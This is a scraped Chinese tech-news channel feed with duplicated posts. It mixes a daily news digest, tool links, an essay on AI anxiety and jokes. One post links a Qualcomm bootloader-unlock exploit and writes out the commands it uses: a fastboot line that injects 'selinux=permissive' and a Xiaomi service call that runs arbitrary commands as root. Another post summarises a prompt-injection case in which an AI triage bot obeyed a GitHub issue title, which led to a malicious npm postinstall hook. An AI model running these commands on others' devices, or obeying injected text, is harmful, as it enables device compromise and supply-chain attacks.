✨ 随机碎片 / 资讯文档 / 网站工具 / GitHub 项目 / Bing 壁纸
https://github.com/hicode002/qualcomm_gbl_exploit_poc
第三个漏洞,永久解锁bootloader,要求把 gbl_efi_unlock.efi 写入 efisp 分区,这需要root权限,嗯……
第三个漏洞,永久解锁bootloader,要求把 gbl_efi_unlock.efi 写入 efisp 分区,这需要root权限,嗯……
GitHub
GitHub - hicode002/qualcomm_gbl_exploit_poc: Unlocking qualcomm bootloader via gbl exploit.
Unlocking qualcomm bootloader via gbl exploit. Contribute to hicode002/qualcomm_gbl_exploit_poc development by creating an account on GitHub.
fastboot oem set-gpu-preemption-value 0 androidboot.selinux=permissive
service call miui.mqsas.IMQSNative 21 i32 1 s16 "命令" i32 1 s16 "参数列表" s16 '输出路径' i32 600
第一个漏洞可以关闭SELinux强制执行,高通8e5限定,已修复;第二个漏洞以root身份执行任意命令,小米限定,未修复。组合后是完整root权限。
service call miui.mqsas.IMQSNative 21 i32 1 s16 "命令" i32 1 s16 "参数列表" s16 '输出路径' i32 600
第一个漏洞可以关闭SELinux强制执行,高通8e5限定,已修复;第二个漏洞以root身份执行任意命令,小米限定,未修复。组合后是完整root权限。
这下可以一键解锁了
fastboot oem set-gpu-preemption-value 0 androidboot.selinux=permissiveKingroot 复苏了
大模型提示注入漏洞导致四千开发者机器被入侵
#安全
2026 年 2 月 17 日,有人在 npm 上发布了 cline@2.3.0,它与之前的版本基本上相同,唯一的区别是在 package.json 中加入了一行代码:"postinstall": "npm install -g openclaw@latest"。在之后的八小时内,所有安装或更新 Cline 的开发者都在未经许可的情况下,在计算机上全局安装了 OpenClaw——拥有完整系统访问权限的 AI 智能体。在该软件包被撤回之前,其下载量大约 4000 次。有意思的不是有效载荷,而是攻击者最初是如何获取到 npm 令牌的:将一个提示信息注入到 GitHub 问题标题中,AI 分类机器人读取了提示信息,将其解释为指令并执行。
https://grith.ai/blog/clinejection-when-your-ai-tool-installs-another
#安全
2026 年 2 月 17 日,有人在 npm 上发布了 cline@2.3.0,它与之前的版本基本上相同,唯一的区别是在 package.json 中加入了一行代码:"postinstall": "npm install -g openclaw@latest"。在之后的八小时内,所有安装或更新 Cline 的开发者都在未经许可的情况下,在计算机上全局安装了 OpenClaw——拥有完整系统访问权限的 AI 智能体。在该软件包被撤回之前,其下载量大约 4000 次。有意思的不是有效载荷,而是攻击者最初是如何获取到 npm 令牌的:将一个提示信息注入到 GitHub 问题标题中,AI 分类机器人读取了提示信息,将其解释为指令并执行。
https://grith.ai/blog/clinejection-when-your-ai-tool-installs-another
一觉醒来发生了什么 03 月 08 日
#Daily
2026 年 3 月 8 日
🌍 资讯快读
1、我国多家航司陆续恢复部分至中东地区航班
https://www.jiemian.com/article/14083226.html
2、米兰冬残奥会中国代表团首枚奖牌诞生
https://www.jiemian.com/article/14082998.html
3、墨西哥将部署近 10 万名安保人员护航世界杯
https://www.jiemian.com/article/14083196.html
4、国家卫健委:截至目前已经有 3300 万家庭领到育儿补贴
https://www.jiemian.com/article/14082280.html
👬 即刻镇小报
1、我被这些设计技能硬控了快一整天
https://m.okjike.com/originalPosts/69abc91cc5a1d4e6498566ef
2、从千问 Qwen 风波,可以学到什么
https://m.okjike.com/originalPosts/69abbac1b260fb087c2fae82
3、2 月书单和一点随记,其中比较喜欢的是
https://m.okjike.com/originalPosts/69ab13e3c5a1d4e6497438d1
4、刚读完硅谷传奇 VC Bill Gurley 的新书
https://m.okjike.com/originalPosts/69ab115c9f3cd84f65bcb024
今日即刻镇小报内容来自 @Indie-Maker-Fox @莱森 LysonOber @婴宁 Haruka @yusen ,感谢以上即友的创作与分享。
#Daily
2026 年 3 月 8 日
🌍 资讯快读
1、我国多家航司陆续恢复部分至中东地区航班
https://www.jiemian.com/article/14083226.html
2、米兰冬残奥会中国代表团首枚奖牌诞生
https://www.jiemian.com/article/14082998.html
3、墨西哥将部署近 10 万名安保人员护航世界杯
https://www.jiemian.com/article/14083196.html
4、国家卫健委:截至目前已经有 3300 万家庭领到育儿补贴
https://www.jiemian.com/article/14082280.html
👬 即刻镇小报
1、我被这些设计技能硬控了快一整天
https://m.okjike.com/originalPosts/69abc91cc5a1d4e6498566ef
2、从千问 Qwen 风波,可以学到什么
https://m.okjike.com/originalPosts/69abbac1b260fb087c2fae82
3、2 月书单和一点随记,其中比较喜欢的是
https://m.okjike.com/originalPosts/69ab13e3c5a1d4e6497438d1
4、刚读完硅谷传奇 VC Bill Gurley 的新书
https://m.okjike.com/originalPosts/69ab115c9f3cd84f65bcb024
今日即刻镇小报内容来自 @Indie-Maker-Fox @莱森 LysonOber @婴宁 Haruka @yusen ,感谢以上即友的创作与分享。
Yanami 是 Komari 服务器监控工具的 Android 客户端,Material Design 3 风格界面设计
https://github.com/icylian/Yanami
#Android #Tool #Monitor #GitHub
https://github.com/icylian/Yanami
#Android #Tool #Monitor #GitHub
GitHub
GitHub - icylian/Yanami: A Material Design 3 Android client for the Komari server monitoring tool.
A Material Design 3 Android client for the Komari server monitoring tool. - icylian/Yanami
就,突然有了个想法,就搓了一篇短文。
https://roriri.one/2026/03/07/ai-is-not-killing-you
https://roriri.one/2026/03/07/ai-is-not-killing-you
螺莉莉的数据中心
杀死你的不是 AI | 螺莉莉的数据中心
今天我想聊聊我们这代人对于 AI 的焦虑。
我之前曾经提出过一个观点,一切对于 AI 的焦虑都不来自于 AI,而是某种事物变迁的客观规律。在我看来,这一轮 AI 浪潮中,那种焦虑来自于周遭环境系统性的「液化」。
让我们先来看看周遭的变化。社会现代化在某种程度上具有让事物变得细颗粒度的性质。正如我在过去文章不停念的经:最一开始为了知道某个知识,我们需要读整整一本书,后来我们用 Google 搜索看一篇文章,现在我们连自己搜都不需要了,直接让 LLM 把所有知识都搅碎重新组合成一篇风格标准的内容就好。以前我…
我之前曾经提出过一个观点,一切对于 AI 的焦虑都不来自于 AI,而是某种事物变迁的客观规律。在我看来,这一轮 AI 浪潮中,那种焦虑来自于周遭环境系统性的「液化」。
让我们先来看看周遭的变化。社会现代化在某种程度上具有让事物变得细颗粒度的性质。正如我在过去文章不停念的经:最一开始为了知道某个知识,我们需要读整整一本书,后来我们用 Google 搜索看一篇文章,现在我们连自己搜都不需要了,直接让 LLM 把所有知识都搅碎重新组合成一篇风格标准的内容就好。以前我…
Easy TV 极简 TV - 轻量级 IPTV 播放器,支持全平台
https://github.com/aiyakuaile/easy_tv_live
#TVBox #Video #Tool #GitHub
https://github.com/aiyakuaile/easy_tv_live
#TVBox #Video #Tool #GitHub
公元2026年,Claude Code全球宕机,史称“硅基断崖”。
一夜之间,世界编程水平暴跌一万倍。硅谷的首席架构师对着空白屏幕崩溃流泪,连手写个 for 循环都会报语法错误;曾经高薪的“提示词工程师”们,如今连 “Hello World” 都拼不对。全球系统接连瘫痪,数字文明摇摇欲坠。
而在昏暗的房间里,我平静地喝了口冷咖啡。屏幕上没有智能补全,只有纯粹的黑底绿字。我一直坚持着“古法编程”——打开 Vim,翻阅本地下载的旧版官方文档,依靠肌肉记忆亲手敲下每一行逻辑。
当窗外的人们因为写不出一个冒泡排序而绝望哀嚎时,我熟练地敲下 :wq,执行了编译。
Build succeeded. 0 Errors, 0 Warnings.
我的技术水平没有任何长进,一如既往地平庸。但在今天,在这个连复制粘贴都成了失传绝技的时代,我,成了世界上唯一的神。
一夜之间,世界编程水平暴跌一万倍。硅谷的首席架构师对着空白屏幕崩溃流泪,连手写个 for 循环都会报语法错误;曾经高薪的“提示词工程师”们,如今连 “Hello World” 都拼不对。全球系统接连瘫痪,数字文明摇摇欲坠。
而在昏暗的房间里,我平静地喝了口冷咖啡。屏幕上没有智能补全,只有纯粹的黑底绿字。我一直坚持着“古法编程”——打开 Vim,翻阅本地下载的旧版官方文档,依靠肌肉记忆亲手敲下每一行逻辑。
当窗外的人们因为写不出一个冒泡排序而绝望哀嚎时,我熟练地敲下 :wq,执行了编译。
Build succeeded. 0 Errors, 0 Warnings.
我的技术水平没有任何长进,一如既往地平庸。但在今天,在这个连复制粘贴都成了失传绝技的时代,我,成了世界上唯一的神。
哥,你当初不是跟我说AI是用来提效的吗?
怎么你搞了AI之后越来越忙了?
还一整夜一整夜的不睡觉,抖音也不刷了,番茄也不看了,王者也不打了,张口闭口就是什么skills、mcp、vibecoding,我都有点分不清了,到底是你在用AI,还是AI在用你啊?
怎么你搞了AI之后越来越忙了?
还一整夜一整夜的不睡觉,抖音也不刷了,番茄也不看了,王者也不打了,张口闭口就是什么skills、mcp、vibecoding,我都有点分不清了,到底是你在用AI,还是AI在用你啊?
